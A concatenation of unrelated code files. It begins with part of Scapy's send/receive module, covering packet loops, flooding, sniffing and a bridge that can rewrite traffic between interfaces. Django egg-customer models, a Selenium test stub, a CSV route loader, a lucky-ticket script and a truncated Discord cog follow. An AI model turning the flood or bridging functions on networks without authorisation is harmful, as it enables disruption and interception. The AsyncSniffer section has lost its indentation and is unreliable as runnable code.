    netif = resolve_iface(iface or conf.iface)
    sock = netif.l2socket()(promisc=promisc, iface=netif,
                            filter=filter, nofilter=nofilter, type=type)
    answered_unanswered = sndrcv(sock, x, *args, **kargs)
    sock.close()
    return answered_unanswered
@conf.commands.register
def srp1(*args, **kargs):
    # type: (*Packet, **Any) -> Optional[Packet]
    """
    Send and receive packets at layer 2 and return only the first answer
    """
    # Run a full srp() exchange and keep only the first received answer.
    answered = srp(*args, **kargs)[0]
    return cast(Packet, answered[0][1]) if len(answered) > 0 else None
# Append doc
# Share the sndrcv parameter documentation across the four sr* entry points.
# Guarded because __doc__ is None under `python -OO` (docstrings stripped),
# in which case there is nothing to append to.
for sr_func in [srp, srp1, sr, sr1]:
    if sr_func.__doc__ is not None:
        sr_func.__doc__ += _DOC_SNDRCV_PARAMS
# SEND/RECV LOOP METHODS
def __sr_loop(srfunc,  # type: Callable[..., Tuple[SndRcvList, PacketList]]
              pkts,  # type: _PacketIterable
              prn=lambda x: x[1].summary(),  # type: Callable[[QueryAnswer], Any]  # noqa: E501
              prnfail=lambda x: x.summary(),  # type: Callable[[Packet], Any]
              inter=1,  # type: int
              timeout=None,  # type: Optional[int]
              count=None,  # type: Optional[int]
              verbose=None,  # type: Optional[int]
              store=1,  # type: int
              *args,  # type: Any
              **kargs  # type: Any
              ):
    # type: (...) -> Tuple[SndRcvList, PacketList]
    """Repeatedly send `pkts` with `srfunc` and print each round's results.

    Shared implementation behind srloop()/srploop(). Stops after `count`
    rounds (forever when None) or on Ctrl-C; returns the accumulated
    (answered, unanswered) lists when `store` is truthy.
    """
    n = 0  # total packets accounted (answered + unanswered)
    r = 0  # total answered packets
    ct = conf.color_theme
    if verbose is None:
        verbose = conf.verb
    parity = 0
    ans = []  # type: List[QueryAnswer]
    unans = []  # type: List[Packet]
    if timeout is None:
        timeout = min(2 * inter, 5)
    try:
        while True:
            # Alternate display colours between rounds.
            parity ^= 1
            col = [ct.even, ct.odd][parity]
            if count is not None:
                if count == 0:
                    break
                count -= 1
            start = time.time()
            if verbose > 1:
                print("\rsend...\r", end=' ')
            res = srfunc(pkts, timeout=timeout, verbose=0, chainCC=True, *args, **kargs)  # noqa: E501
            n += len(res[0]) + len(res[1])
            r += len(res[0])
            if verbose > 1 and prn and len(res[0]) > 0:
                msg = "RECV %i:" % len(res[0])
                print("\r" + ct.success(msg), end=' ')
                for p in res[0]:
                    print(col(prn(p)))
                    print(" " * len(msg), end=' ')
            if verbose > 1 and prnfail and len(res[1]) > 0:
                msg = "fail %i:" % len(res[1])
                print("\r" + ct.fail(msg), end=' ')
                for p in res[1]:
                    print(col(prnfail(p)))
                    print(" " * len(msg), end=' ')
            if verbose > 1 and not (prn or prnfail):
                print("recv:%i fail:%i" % tuple(map(len, res[:2])))
            if store:
                ans += res[0]
                unans += res[1]
            end = time.time()
            # Pace the loop so rounds start at least `inter` seconds apart.
            if end - start < inter:
                time.sleep(inter + start - end)
    except KeyboardInterrupt:
        pass
    if verbose and n > 0:
        print(ct.normal("\nSent %i packets, received %i packets. %3.1f%% hits." % (n, r, 100.0 * r / n)))  # noqa: E501
    return SndRcvList(ans), PacketList(unans)
@conf.commands.register
def srloop(pkts,  # type: _PacketIterable
           *args,  # type: Any
           **kargs  # type: Any
           ):
    # type: (...) -> Tuple[SndRcvList, PacketList]
    """
    Send a packet at layer 3 in loop and print the answer each time
    srloop(pkts, [prn], [inter], [count], ...) --> None
    """
    # Delegate to the shared loop helper with sr as the L3 primitive.
    return __sr_loop(sr, pkts, *args, **kargs)
@conf.commands.register
def srploop(pkts,  # type: _PacketIterable
            *args,  # type: Any
            **kargs  # type: Any
            ):
    # type: (...) -> Tuple[SndRcvList, PacketList]
    """
    Send a packet at layer 2 in loop and print the answer each time
    srploop(pkts, [prn], [inter], [count], ...) --> None
    """
    # DOCFIX: the usage line above previously read "srloop(...)" — a
    # copy-paste from the layer-3 variant.
    # Delegate to the shared loop helper with srp as the L2 primitive.
    return __sr_loop(srp, pkts, *args, **kargs)
# SEND/RECV FLOOD METHODS
def sndrcvflood(pks,  # type: SuperSocket
                pkt,  # type: _PacketIterable
                inter=0,  # type: int
                verbose=None,  # type: Optional[int]
                chainCC=False,  # type: bool
                timeout=None  # type: Optional[int]
                ):
    # type: (...) -> Tuple[SndRcvList, PacketList]
    """sndrcv equivalent for flooding."""
    halt = Event()

    def repeat_until_stopped(packets, stop):
        # type: (_PacketIterable, Event) -> Iterator[Packet]
        """Yield the packets over and over until `stop` is set."""
        while not stop.is_set():
            for candidate in packets:
                if stop.is_set():
                    return
                yield candidate

    # The real number of distinct packets, passed to sndrcv via _flood so
    # accounting stays correct despite the infinite generator.
    if isinstance(pkt, Gen):
        flood_len = pkt.__iterlen__()
    else:
        flood_len = len(pkt)
    return sndrcv(
        pks, repeat_until_stopped(pkt, halt),
        inter=inter, verbose=verbose,
        chainCC=chainCC, timeout=timeout,
        _flood=[flood_len, halt.set]
    )
@conf.commands.register
def srflood(x,  # type: _PacketIterable
            promisc=None,  # type: Optional[bool]
            filter=None,  # type: Optional[str]
            iface=None,  # type: Optional[_GlobInterfaceType]
            nofilter=None,  # type: Optional[bool]
            *args,  # type: Any
            **kargs  # type: Any
            ):
    # type: (...) -> Tuple[SndRcvList, PacketList]
    """Flood and receive packets at layer 3
    :param prn: function applied to packets received
    :param unique: only consider packets whose print
    :param nofilter: put 1 to avoid use of BPF filters
    :param filter: provide a BPF filter
    :param iface: listen answers only on the given interface
    """
    netif = resolve_iface(iface or conf.iface)
    sock = netif.l3socket()(promisc=promisc, filter=filter, iface=netif, nofilter=nofilter)  # noqa: E501
    answered_unanswered = sndrcvflood(sock, x, *args, **kargs)
    sock.close()
    return answered_unanswered
@conf.commands.register
def sr1flood(x,  # type: _PacketIterable
             promisc=None,  # type: Optional[bool]
             filter=None,  # type: Optional[str]
             iface=None,  # type: Optional[_GlobInterfaceType]
             nofilter=0,  # type: int
             *args,  # type: Any
             **kargs  # type: Any
             ):
    # type: (...) -> Optional[Packet]
    """Flood and receive packets at layer 3 and return only the first answer
    :param prn: function applied to packets received
    :param verbose: set verbosity level
    :param nofilter: put 1 to avoid use of BPF filters
    :param filter: provide a BPF filter
    :param iface: listen answers only on the given interface
    """
    netif = resolve_iface(iface or conf.iface)
    sock = netif.l3socket()(promisc=promisc, filter=filter, nofilter=nofilter, iface=netif)  # noqa: E501
    answered = sndrcvflood(sock, x, *args, **kargs)[0]
    sock.close()
    # First matched (sent, received) pair -> its received half, if any.
    return cast(Packet, answered[0][1]) if len(answered) > 0 else None
@conf.commands.register
def srpflood(x,  # type: _PacketIterable
             promisc=None,  # type: Optional[bool]
             filter=None,  # type: Optional[str]
             iface=None,  # type: Optional[_GlobInterfaceType]
             iface_hint=None,  # type: Optional[str]
             nofilter=None,  # type: Optional[bool]
             *args,  # type: Any
             **kargs  # type: Any
             ):
    # type: (...) -> Tuple[SndRcvList, PacketList]
    """Flood and receive packets at layer 2
    :param prn: function applied to packets received
    :param unique: only consider packets whose print
    :param nofilter: put 1 to avoid use of BPF filters
    :param filter: provide a BPF filter
    :param iface: listen answers only on the given interface
    """
    # Fall back to the routing table when only a destination hint is given.
    if iface is None and iface_hint is not None:
        iface = conf.route.route(iface_hint)[0]
    netif = resolve_iface(iface or conf.iface)
    sock = netif.l2socket()(promisc=promisc, filter=filter, iface=netif, nofilter=nofilter)  # noqa: E501
    answered_unanswered = sndrcvflood(sock, x, *args, **kargs)
    sock.close()
    return answered_unanswered
@conf.commands.register
def srp1flood(x,  # type: _PacketIterable
              promisc=None,  # type: Optional[bool]
              filter=None,  # type: Optional[str]
              iface=None,  # type: Optional[_GlobInterfaceType]
              nofilter=0,  # type: int
              *args,  # type: Any
              **kargs  # type: Any
              ):
    # type: (...) -> Optional[Packet]
    """Flood and receive packets at layer 2 and return only the first answer
    :param prn: function applied to packets received
    :param verbose: set verbosity level
    :param nofilter: put 1 to avoid use of BPF filters
    :param filter: provide a BPF filter
    :param iface: listen answers only on the given interface
    """
    netif = resolve_iface(iface or conf.iface)
    sock = netif.l2socket()(promisc=promisc, filter=filter, nofilter=nofilter, iface=netif)  # noqa: E501
    answered = sndrcvflood(sock, x, *args, **kargs)[0]
    sock.close()
    # First matched (sent, received) pair -> its received half, if any.
    return cast(Packet, answered[0][1]) if len(answered) > 0 else None
# SNIFF METHODS
class AsyncSniffer(object):
"""
Sniff packets and return a list of packets.
Args:
count: number of packets to capture. 0 means infinity.
store: whether to store sniffed packets or discard them
prn: function to apply to each packet. If something is returned, it
is displayed.
--Ex: prn = lambda x: x.summary()
session: a session = a flow decoder used to handle stream of packets.
--Ex: session=TCPSession
See below for more details.
filter: BPF filter to apply.
lfilter: Python function applied to each packet to determine if
further action may be done.
--Ex: lfilter = lambda x: x.haslayer(Padding)
offline: PCAP file (or list of PCAP files) to read packets from,
instead of sniffing them
quiet: when set to True, the process stderr is discarded
(default: False).
timeout: stop sniffing after a given time (default: None).
L2socket: use the provided L2socket (default: use conf.L2listen).
opened_socket: provide an object (or a list of objects) ready to use
.recv() on.
stop_filter: Python function applied to each packet to determine if
we have to stop the capture after this packet.
--Ex: stop_filter = lambda x: x.haslayer(TCP)
iface: interface or list of interfaces (default: None for sniffing
on all interfaces).
monitor: use monitor mode. May not be available on all OS
started_callback: called as soon as the sniffer starts sniffing
(default: None).
The iface, offline and opened_socket parameters can be either an
element, a list of elements, or a dict object mapping an element to a
label (see examples below).
For more information about the session argument, see
https://scapy.rtfd.io/en/latest/usage.html#advanced-sniffing-sniffing-sessions
Examples: synchronous
>>> sniff(filter="arp")
>>> sniff(filter="tcp",
... session=IPSession, # defragment on-the-flow
... prn=lambda x: x.summary())
>>> sniff(lfilter=lambda pkt: ARP in pkt)
>>> sniff(iface="eth0", prn=Packet.summary)
>>> sniff(iface=["eth0", "mon0"],
... prn=lambda pkt: "%s: %s" % (pkt.sniffed_on,
... pkt.summary()))
>>> sniff(iface={"eth0": "Ethernet", "mon0": "Wifi"},
... prn=lambda pkt: "%s: %s" % (pkt.sniffed_on,
... pkt.summary()))
Examples: asynchronous
>>> t = AsyncSniffer(iface="enp0s3")
>>> t.start()
>>> time.sleep(1)
>>> print("nice weather today")
>>> t.stop()
"""
def __init__(self, *args, **kwargs):
# type: (*Any, **Any) -> None
# Store keyword arguments
self.args = args
self.kwargs = kwargs
self.running = False
self.thread = None # type: Optional[Thread]
self.results = None # type: Optional[PacketList]
def _setup_thread(self):
# type: () -> None
# Prepare sniffing thread
self.thread = Thread(
target=self._run,
args=self.args,
kwargs=self.kwargs,
name="AsyncSniffer"
)
self.thread.setDaemon(True)
    def _run(self,
             count=0,  # type: int
             store=True,  # type: bool
             offline=None,  # type: Any
             quiet=False,  # type: bool
             prn=None,  # type: Optional[Callable[[Packet], Any]]
             lfilter=None,  # type: Optional[Callable[[Packet], bool]]
             L2socket=None,  # type: Optional[Type[SuperSocket]]
             timeout=None,  # type: Optional[int]
             opened_socket=None,  # type: Optional[SuperSocket]
             stop_filter=None,  # type: Optional[Callable[[Packet], bool]]
             iface=None,  # type: Optional[_GlobInterfaceType]
             started_callback=None,  # type: Optional[Callable[[], Any]]
             session=None,  # type: Optional[_GlobSessionType]
             session_kwargs={},  # type: Dict[str, Any]
             **karg  # type: Any
             ):
        # type: (...) -> None
        """Sniffing main loop (executed in the caller's thread).

        Resolves the capture sources (already-opened sockets, offline
        inputs, or live interfaces), then polls them with the sockets'
        select function until stopped, feeding every received packet to
        the session.  Results end up in ``self.results``.
        """
        # NOTE: the mutable default ``session_kwargs={}`` is safe here --
        # it is only ever **-expanded, never mutated.
        self.running = True
        # Start main thread
        # instantiate session
        if not isinstance(session, DefaultSession):
            session = session or DefaultSession
            session = session(prn=prn, store=store,
                              **session_kwargs)
        else:
            # An already-instantiated session was passed: just rebind the
            # callback/storage settings on it.
            session.prn = prn
            session.store = store
        # sniff_sockets follows: {socket: label}
        sniff_sockets = {}  # type: Dict[SuperSocket, _GlobInterfaceType]
        if opened_socket is not None:
            # Caller supplied ready-to-recv() socket(s): single object,
            # list (auto-labeled "socketN") or {socket: label} dict.
            if isinstance(opened_socket, list):
                sniff_sockets.update(
                    (s, "socket%d" % i)
                    for i, s in enumerate(opened_socket)
                )
            elif isinstance(opened_socket, dict):
                sniff_sockets.update(
                    (s, label)
                    for s, label in six.iteritems(opened_socket)
                )
            else:
                sniff_sockets[opened_socket] = "socket0"
        if offline is not None:
            # Offline sources are wrapped in PcapReader; a BPF filter is
            # applied by piping the input through tcpdump -w -.
            flt = karg.get('filter')
            if isinstance(offline, str):
                # Single file
                offline = [offline]
            if isinstance(offline, list) and \
                    all(isinstance(elt, str) for elt in offline):
                # List of files
                sniff_sockets.update((PcapReader(
                    fname if flt is None else
                    tcpdump(fname,
                            args=["-w", "-"],
                            flt=flt,
                            getfd=True,
                            quiet=quiet)
                ), fname) for fname in offline)
            elif isinstance(offline, dict):
                # Dict of files
                sniff_sockets.update((PcapReader(
                    fname if flt is None else
                    tcpdump(fname,
                            args=["-w", "-"],
                            flt=flt,
                            getfd=True,
                            quiet=quiet)
                ), label) for fname, label in six.iteritems(offline))
            elif isinstance(offline, (Packet, PacketList, list)):
                # Iterables (list of packets, PacketList..)
                offline = IterSocket(offline)
                sniff_sockets[offline if flt is None else PcapReader(
                    tcpdump(offline,
                            args=["-w", "-"],
                            flt=flt,
                            getfd=True,
                            quiet=quiet)
                )] = offline
            else:
                # Other (file descriptors...)
                sniff_sockets[PcapReader(
                    offline if flt is None else
                    tcpdump(offline,
                            args=["-w", "-"],
                            flt=flt,
                            getfd=True,
                            quiet=quiet)
                )] = offline
        if not sniff_sockets or iface is not None:
            # Live capture: open an L2 listening socket per interface
            # (single iface, list of ifaces, or {iface: label} dict).
            iface = resolve_iface(iface or conf.iface)
            if L2socket is None:
                L2socket = iface.l2listen()
            if isinstance(iface, list):
                sniff_sockets.update(
                    (L2socket(type=ETH_P_ALL, iface=ifname, **karg),
                     ifname)
                    for ifname in iface
                )
            elif isinstance(iface, dict):
                sniff_sockets.update(
                    (L2socket(type=ETH_P_ALL, iface=ifname, **karg),
                     iflabel)
                    for ifname, iflabel in six.iteritems(iface)
                )
            else:
                sniff_sockets[L2socket(type=ETH_P_ALL, iface=iface,
                                       **karg)] = iface
        # Get select information from the sockets
        _main_socket = next(iter(sniff_sockets))
        select_func = _main_socket.select
        nonblocking_socket = _main_socket.nonblocking_socket
        # We check that all sockets use the same select(), or raise a warning
        if not all(select_func == sock.select for sock in sniff_sockets):
            warning("Warning: inconsistent socket types ! "
                    "The used select function "
                    "will be the one of the first socket")

        if not nonblocking_socket:
            # select is blocking: Add special control socket
            # (stop() writes to the pipe, which wakes select() up).
            from scapy.automaton import ObjectPipe
            close_pipe = ObjectPipe()
            sniff_sockets[close_pipe] = "control_socket"

            def stop_cb():
                # type: () -> None
                if self.running:
                    close_pipe.send(None)
                self.continue_sniff = False
            self.stop_cb = stop_cb
        else:
            # select is non blocking
            def stop_cb():
                # type: () -> None
                self.continue_sniff = False
            self.stop_cb = stop_cb
            close_pipe = None

        try:
            if started_callback:
                started_callback()
            self.continue_sniff = True

            # Start timeout
            if timeout is not None:
                stoptime = time.time() + timeout
            remain = None

            while sniff_sockets and self.continue_sniff:
                if timeout is not None:
                    remain = stoptime - time.time()
                    if remain <= 0:
                        break
                sockets = select_func(list(sniff_sockets.keys()), remain)
                dead_sockets = []
                for s in sockets:
                    if s is close_pipe:
                        # Control socket fired: leave the recv loop.
                        break
                    try:
                        p = s.recv()
                    except EOFError:
                        # End of stream
                        try:
                            s.close()
                        except Exception:
                            pass
                        dead_sockets.append(s)
                        continue
                    except Exception as ex:
                        msg = " It was closed."
                        try:
                            # Make sure it's closed
                            s.close()
                        except Exception as ex2:
                            msg = " close() failed with '%s'" % ex2
                        warning(
                            "Socket %s failed with '%s'." % (s, ex) + msg
                        )
                        dead_sockets.append(s)
                        if conf.debug_dissector >= 2:
                            raise
                        continue
                    if p is None:
                        continue
                    if lfilter and not lfilter(p):
                        continue
                    p.sniffed_on = sniff_sockets[s]
                    # on_packet_received handles the prn/storage
                    session.on_packet_received(p)
                    # check
                    if (stop_filter and stop_filter(p)) or \
                            (0 < count <= session.count):
                        self.continue_sniff = False
                        break
                # Removed dead sockets
                for s in dead_sockets:
                    del sniff_sockets[s]
        except KeyboardInterrupt:
            pass
        self.running = False
        if opened_socket is None:
            # We opened these sockets ourselves, so we close them;
            # caller-provided sockets are left open.
            for s in sniff_sockets:
                s.close()
        elif close_pipe:
            close_pipe.close()
        self.results = session.toPacketList()
    def start(self):
        # type: () -> None
        """Starts AsyncSniffer in async mode"""
        # Build the worker thread, then launch it.
        self._setup_thread()
        if self.thread:
            self.thread.start()
    def stop(self, join=True):
        # type: (bool) -> Optional[PacketList]
        """Stops AsyncSniffer if not in async mode

        :param join: wait for the sniffing thread to finish and return the
            captured PacketList; when False, returns None immediately.
        """
        if self.running:
            try:
                self.stop_cb()
            except AttributeError:
                # stop_cb is only bound once _run() reaches its main loop.
                raise Scapy_Exception(
                    "Unsupported (offline or unsupported socket)"
                )
            if join:
                self.join()
                return self.results
            return None
        else:
            raise Scapy_Exception("Not started !")
    def join(self, *args, **kwargs):
        # type: (*Any, **Any) -> None
        """Wait for the sniffing thread to end (args go to Thread.join)."""
        if self.thread:
            self.thread.join(*args, **kwargs)
@conf.commands.register
def sniff(*args, **kwargs):
    # type: (*Any, **Any) -> PacketList
    # Synchronous wrapper: run the sniffer in the current thread (blocks
    # until done) and return the captured packets.  No docstring here on
    # purpose -- it is copied from AsyncSniffer right below.
    sniffer = AsyncSniffer()
    sniffer._run(*args, **kwargs)
    return cast(PacketList, sniffer.results)


sniff.__doc__ = AsyncSniffer.__doc__
@conf.commands.register
def bridge_and_sniff(if1,  # type: _GlobInterfaceType
                     if2,  # type: _GlobInterfaceType
                     xfrm12=None,  # type: Optional[Callable[[Packet], Union[Packet, bool]]]  # noqa: E501
                     xfrm21=None,  # type: Optional[Callable[[Packet], Union[Packet, bool]]]  # noqa: E501
                     prn=None,  # type: Optional[Callable[[Packet], Any]]
                     L2socket=None,  # type: Optional[Type[SuperSocket]]
                     *args,  # type: Any
                     **kargs  # type: Any
                     ):
    # type: (...) -> PacketList
    """Forward traffic between interfaces if1 and if2, sniff and return
    the exchanged packets.

    :param if1: the interfaces to use (interface names or opened sockets).
    :param if2:
    :param xfrm12: a function to call when forwarding a packet from if1 to
        if2. If it returns True, the packet is forwarded as it. If it
        returns False or None, the packet is discarded. If it returns a
        packet, this packet is forwarded instead of the original packet
        one.
    :param xfrm21: same as xfrm12 for packets forwarded from if2 to if1.

    The other arguments are the same than for the function sniff(),
    except for offline, opened_socket and iface that are ignored.
    See help(sniff) for more.
    """
    # These sniff() arguments conflict with the bridging setup below, so
    # they are stripped (with a warning) rather than silently honoured.
    for arg in ['opened_socket', 'offline', 'iface']:
        if arg in kargs:
            log_runtime.warning("Argument %s cannot be used in "
                                "bridge_and_sniff() -- ignoring it.", arg)
            del kargs[arg]

    def _init_socket(iface,  # type: _GlobInterfaceType
                     count,  # type: int
                     L2socket=L2socket  # type: Optional[Type[SuperSocket]]
                     ):
        # type: (...) -> Tuple[SuperSocket, _GlobInterfaceType]
        # Accept either an already-opened socket or an interface name;
        # always return an (opened socket, label) pair.
        if isinstance(iface, SuperSocket):
            return iface, "iface%d" % count
        else:
            if not L2socket:
                iface = resolve_iface(iface or conf.iface)
                L2socket = iface.l2socket()
            return L2socket(iface=iface), iface
    sckt1, if1 = _init_socket(if1, 1)
    sckt2, if2 = _init_socket(if2, 2)
    # Forwarding tables: where to send a packet sniffed on each side, and
    # which (optional) transformation to apply first.
    peers = {if1: sckt2, if2: sckt1}
    xfrms = {}
    if xfrm12 is not None:
        xfrms[if1] = xfrm12
    if xfrm21 is not None:
        xfrms[if2] = xfrm21

    def prn_send(pkt):
        # type: (Packet) -> None
        # Called for every sniffed packet: transform (if configured) and
        # forward it to the opposite interface, dropping it on errors.
        try:
            sendsock = peers[pkt.sniffed_on or ""]
        except KeyError:
            return
        if pkt.sniffed_on in xfrms:
            try:
                _newpkt = xfrms[pkt.sniffed_on](pkt)
            except Exception:
                log_runtime.warning(
                    'Exception in transformation function for packet [%s] '
                    'received on %s -- dropping',
                    pkt.summary(), pkt.sniffed_on, exc_info=True
                )
                return
            else:
                # bool result = forward original (True) / drop (False);
                # a Packet result replaces the original.
                if isinstance(_newpkt, bool):
                    if not _newpkt:
                        return
                    newpkt = pkt
                else:
                    newpkt = _newpkt
        else:
            newpkt = pkt
        try:
            sendsock.send(newpkt)
        except Exception:
            log_runtime.warning('Cannot forward packet [%s] received on %s',
                                pkt.summary(), pkt.sniffed_on, exc_info=True)
    if prn is None:
        prn = prn_send
    else:
        # Chain the user callback after the forwarding one.
        prn_orig = prn

        def prn(pkt):
            # type: (Packet) -> Any
            prn_send(pkt)
            return prn_orig(pkt)

    return sniff(opened_socket={sckt1: if1, sckt2: if2}, prn=prn,
                 *args, **kargs)
@conf.commands.register
def tshark(*args, **kargs):
    # type: (Any, Any) -> None
    """Sniff packets and print them calling pkt.summary().

    This tries to replicate what text-wireshark (tshark) would look like.
    Accepts the same arguments as sniff().
    """
    # Work out a capture-source label for the banner line.
    if 'iface' in kargs:
        iface = kargs.get('iface')
    elif 'opened_socket' in kargs:
        iface = cast(SuperSocket, kargs.get('opened_socket')).iface
    else:
        iface = conf.iface
    print("Capturing on '%s'" % iface)

    # This should be a nonlocal variable, using a mutable object
    # for Python 2 compatibility
    i = [0]

    def _cb(pkt):
        # type: (Packet) -> None
        print("%5d\t%s" % (i[0], pkt.summary()))
        i[0] += 1

    sniff(prn=_cb, store=False, *args, **kargs)
    # Bug fix: use "!= 1" so zero packets reads "0 packets captured"
    # (the original "> 1" printed "0 packet captured").
    print("\n%d packet%s captured" % (i[0], 's' if i[0] != 1 else ''))
|
# -*- coding: utf-8 -*-
#########################################################################
#
# Copyright (C) 2020: TelelBirds
#
#
#########################################################################
from __future__ import unicode_literals
import os
import datetime
from django.core.validators import MaxValueValidator, MinValueValidator
from django.db import models
from django.db.models import ImageField
from django.utils.safestring import mark_safe
from django.template.defaultfilters import truncatechars, slugify # or truncatewords
from django.contrib.gis.db import models as gismodels
from imagekit.models import ProcessedImageField
from imagekit.processors import ResizeToFit
from telelbirds import settings
from apps.breeders.models import Breeders, Breed
class Customer(models.Model):
    """
    Customer Model

    Contact details, optional geographic location and notification /
    delivery preferences for a customer.  ``full_name`` is denormalized
    and refreshed in save().
    """
    id = models.AutoField(primary_key=True)
    first_name = models.CharField(null=True, blank=True, max_length=50)
    last_name = models.CharField(null=True, blank=True, max_length=50)
    full_name = models.CharField(null=True, blank=True, max_length=50)
    photo = ProcessedImageField(upload_to='customer_photos', null=True, blank=True, processors=[ResizeToFit(1280)], format='JPEG', options={'quality': 70})
    email = models.EmailField(null=True, blank=True, max_length=50)
    phone = models.CharField(null=True, blank=True, max_length=15)
    address = models.CharField(null=True, blank=True, max_length=50)
    location = gismodels.PointField(
        srid=4326,
        null=True,
        spatial_index=True,
        geography=True,
        blank=True)  # Point (WGS84)
    latitude = models.FloatField(null=True, blank=True)
    longitude = models.FloatField(null=True, blank=True)
    customertype = models.CharField(null=True, blank=True, max_length=50)
    # Bug fix: this field was declared twice; the first declaration was
    # dead (the second assignment overwrote it in the class namespace).
    # NOTE(review): a differently named field (e.g. notification_email)
    # may have been intended -- confirm with the original author.
    # max_length removed from BooleanFields: it is meaningless there.
    notification_sms = models.BooleanField(null=True, blank=True)
    delivery = models.BooleanField(null=True, blank=True)
    followup = models.BooleanField(null=True, blank=True)
    created = models.DateTimeField(auto_now_add=True)

    class Meta:
        ordering = ['created']
        db_table = "customers"
        verbose_name = 'Customer'
        verbose_name_plural = "Customers"
        managed = True

    def save(self, *args, **kwargs):
        # Both name fields are nullable; join only the parts that are set
        # so save() can never raise TypeError on None concatenation.
        self.full_name = " ".join(
            part for part in (self.first_name, self.last_name) if part
        )
        super(Customer, self).save(*args, **kwargs)

    def __str__(self):
        return self.last_name + ", " + self.first_name

    def get_absolute_url(self):
        return '/customer/{}'.format(self.full_name)
class Eggs(models.Model):
    """
    Eggs Model

    A batch of eggs associated with a customer and breed.  ``received``
    is derived in save() as ``brought - returned``.
    """
    id = models.AutoField(primary_key=True)
    batchnumber = models.CharField(null=True, blank=True, max_length=50)
    customer = models.ForeignKey(Customer,
                                 related_name="eggs_customer", blank=True, null=True,
                                 on_delete=models.SET_NULL)
    breed = models.ForeignKey(Breed,
                              related_name="eggs_breed", blank=True, null=True,
                              on_delete=models.SET_NULL)
    customercode = models.CharField(null=True, blank=True, max_length=50)
    photo = ProcessedImageField(upload_to='eggs_photos', null=True, blank=True, processors=[ResizeToFit(1280)], format='JPEG', options={'quality': 70})
    brought = models.IntegerField(null=True, blank=True)
    returned = models.IntegerField(null=True, blank=True)
    # max_length removed: it is meaningless (and ignored) on IntegerField.
    received = models.IntegerField(null=True, blank=True)
    created = models.DateTimeField(auto_now_add=True)

    class Meta:
        ordering = ['created']
        db_table = "eggs"
        verbose_name = 'Egg'
        verbose_name_plural = "Eggs"
        managed = True

    def save(self, *args, **kwargs):
        # Bug fix: both counts are nullable, and None - None raised
        # TypeError; derive ``received`` only when both are present.
        if self.brought is not None and self.returned is not None:
            self.received = self.brought - self.returned
        super(Eggs, self).save(*args, **kwargs)

    def __str__(self):
        return self.batchnumber

    def get_absolute_url(self):
        return '/customer_eggs/{}'.format(self.batchnumber)
class CustomerRequest(models.Model):
    """
    CustomerRequest Model

    A request raised by a customer, optionally tied to an egg batch.
    """
    id = models.AutoField(primary_key=True)
    requestcode=models.CharField(null=True,blank=True,max_length=50)
    eggs=models.ForeignKey(Eggs,
        related_name="customerrequest_eggs", blank=True, null=True,
        on_delete=models.SET_NULL)
    created = models.DateTimeField(auto_now_add=True)

    class Meta:
        ordering = ['created']
        db_table = "CustomerRequests"
        verbose_name = 'CustomerRequest'
        verbose_name_plural = "CustomerRequests"
        managed = True

    def get_absolute_url(self):
        # NOTE(review): unlike the other models this one defines no
        # __str__, so the admin shows the default object repr.
        return '/customer_request/{}'.format(self.requestcode)
import unittest
from selenium import webdriver
class NewVisitorTest(unittest.TestCase):
    """Browser-driven functional test for the site's login flow.

    Requires a dev server on http://127.0.0.1:8000 and Firefox with a
    webdriver on PATH.  The trailing comments sketch steps that are not
    implemented yet.
    """

    def setUp(self):
        # A fresh browser per test keeps tests independent of each other.
        self.browser = webdriver.Firefox()

    def tearDown(self):
        self.browser.quit()

    def test_user_can_login(self):
        # Clive knows of a website which contains lots of torrent that he wants to try out
        # He navigates to it in his browser
        self.browser.get('http://127.0.0.1:8000')
        # He notices that the browser title says he's made it to the right site
        self.assertIn('Forked Tongue', self.browser.title)
        # He is asked to log into the website, He notices this is also in the page title.
        self.assertIn('login', self.browser.title)
        # He types in his login details incorrectly the first time.
        # He notices he is back on the login page, with a message stating his credentials were incorrect.
        # He trys again, and this time successfully logs in.
        # He can tell he's now logged in from the title bar and the user interface displaying his name.
|
import csv
import sys
from entities.Location import Location
from structures.Graph import Graph
from .Logger import Logger
sys.path.append("..")
class RouteLoader:
    """Loads the distance table from a file."""

    def __init__(self, filename):
        """Remember the CSV file path; the graph is built lazily by load()."""
        super().__init__()
        self.filename = filename
        self.packages = None
        self.graph = None

    def load(self):
        """Loads the contents of the file passed to constructor."""
        with open(self.filename, mode='r') as csv_file:
            reader = csv.DictReader(csv_file)
            # The first two columns are labels, not destinations, so the
            # graph needs one vertex per remaining column.
            self.graph = Graph(len(reader.fieldnames) - 2)
            row_count = 0
            # Overall time complexity is O(N^2)
            for row_count, row in enumerate(reader, start=1):
                if row_count == 1:
                    # Announce the load and dump the header names once.
                    Logger.log(Logger.LogLevel.INFORMATION,
                               f"Loading destinations from {self.filename}")
                    Logger.log(Logger.LogLevel.DEBUG,
                               "Columns: " + ", ".join(row))
                # The CSV is assumed to be in matrix format, with rows in
                # the same order as the columns.
                Logger.log(
                    Logger.LogLevel.DEBUG,
                    f"Row {row_count}: Location {row[reader.fieldnames[0]]}")
                # The second column holds the vertex name, so it matches
                # up with the packages.
                origin = Location(row[reader.fieldnames[1]].strip())
                self.graph.add_vertex(origin)
                # Not all vertex names are known yet while loading, so the
                # row is addressed by name but each column by index. O(N).
                for col_index in range(2, len(reader.fieldnames)):
                    cell = row[reader.fieldnames[col_index]]
                    try:
                        # Non-numeric (empty) cells are skipped; they get
                        # filled in later if the graph is undirected.
                        self.graph.add_edge(origin, col_index - 2,
                                            float(cell))
                    except ValueError:
                        pass
        Logger.log(Logger.LogLevel.INFORMATION,
                   f"Loaded {row_count} destinations")
|
# Lucky-ticket check: a ticket number is "lucky" when the digit sum of
# its first half (all but the last three digits) equals the digit sum of
# its last three digits.
ticket = int(input())  # input() already returns str; str() was redundant

# Split the number into its two halves in one step.
first_half, second_half = divmod(ticket, 1000)


def _digit_sum(value):
    """Return the sum of the decimal digits of a non-negative int."""
    return sum(int(digit) for digit in str(value))


if _digit_sum(first_half) == _digit_sum(second_half):
    print("Счастливый")
else:
    print("Обычный")
|
from discord.ext import commands
from Bot.utils.staff.staff_checks import *
from main import main_db
from pathlib import Path
from config import prefixes
# Handle to the "users" collection of the bot's main database.
users = main_db["users"]
# NOTE(review): not referenced anywhere in this file's visible code --
# presumably meant to protect these cogs from the reload commands below;
# confirm before removing.
blacklisted_files = ["shutdown", "start", "reload"]
class devtools(commands.Cog):
    """Developer utilities: live (re)loading of the bot's cog extensions."""

    def __init__(self, bot):
        self.bot = bot

    @staticmethod
    def _ext_name(path):
        """Translate a cog file Path into a dotted extension name.

        E.g. Bot/cogs/misc/fun.py -> "Bot.cogs.misc.fun" (the joined parts
